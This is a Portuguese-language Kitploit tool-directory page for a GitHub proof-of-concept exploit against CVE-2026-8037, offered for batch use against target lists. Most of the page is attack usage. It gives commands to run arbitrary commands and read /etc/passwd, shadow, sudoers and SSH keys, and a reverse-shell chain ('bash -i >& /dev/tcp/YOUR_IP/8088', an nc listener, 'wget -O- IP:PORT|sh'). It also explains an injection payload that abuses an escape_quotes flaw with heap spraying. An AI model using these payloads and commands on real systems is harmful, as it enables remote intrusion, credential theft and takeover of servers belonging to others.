Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-8037-POC — Inclui detecção de comandos executáveis e getshell com um clique (requer implantação de serviço no servidor) | Kitploit
Ferramentas/GitHubGitHub/caster-chen/cve-2026-8037-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Inclui detecção de comandos executáveis e getshell com um clique (requer implantação de serviço no servidor)

Ver Repositório
3há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-8037-POC

Inclui detecção de comandos executáveis e obtenção de shell com um clique (requer serviço no servidor) pco.yaml pode ser usado com nuclei para detecção rápida

Início Rápido

Modo Interativo

root@kitploit:~
python go.py

Insira a URL alvo → selecione a função no menu.

Detectar Alvo

root@kitploit:~
# Detecção rápida (8 informações básicas)
python go.py -t https://IP:PORT --probe fast

# Detecção profunda (todos os comandos: 30+ itens)
python go.py -t https://IP:PORT --probe deep

# Detecção em lote
python go.py -f vulnerable_targets.txt --probe fast

Executar Comando

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# Lote concorrente (20 threads)
python go.py -f targets.txt -c "hostname" --batch 20

Obter Shell Reverso com um Clique

Na máquina atacante, abra dois terminais:

root@kitploit:~
# Terminal 1 - Serviço HTTP (fornece rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# Terminal 2 - Aguardar reversão
nc -lvnp 8088

Em seguida, envie o payload:

root@kitploit:~
# Alvo único
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# Lote (serial, apenas um de cada vez)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

O script imprimirá os passos de preparação antes de enviar.


Conteúdo da Detecção Profunda

CategoriaComando
Informações básicashostname, uname -a, kernel, OS release, uptime
Usuárioid, whoami, users/w/who
Redeifconfig, route, arp, listening ports, connections, iptables
Sistemaprocesses, cpuinfo, meminfo, disk, mount
Arquivosls / /root /tmp /home /etc
Configuraçõescrontab, passwd, shadow, sudoers, SSH keys
Extrasconfig search, scripts, docker, containers

Princípio da Injeção

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <comando> #", ...}
  • apiuser="''''" dispara a vulnerabilidade de escape_quotes() sem terminação nula
  • g0~g60 heap spraying 61 vezes, aumentando a taxa de sucesso
  • '; <comando> # fecha o contexto, # comenta o restante

Limitação de Comprimento

Sem echo tag, pode-se usar 34 caracteres:

root@kitploit:~
wget -O- IP:PORT|sh    (31 caracteres)

Cadeia de pipe: wget baixa → sh executa → bash reverte para a porta especificada.


Resumo de Parâmetros

ParâmetroDescrição
-t, --target URLEndereço alvo
-f, --file FILEArquivo com lista de alvos
-l, --lhost IPIP da máquina atacante
-p, --lport PORTPorta do serviço HTTP (padrão 8087)
-n, --ncport PORTPorta de escuta nc (padrão 8088)
-c, --cmd CMDComando a executar
--probe fast/deepDetecção rápida/profunda
--batch NNúmero de concorrência em lote (padrão serial)
Baixar ferramenta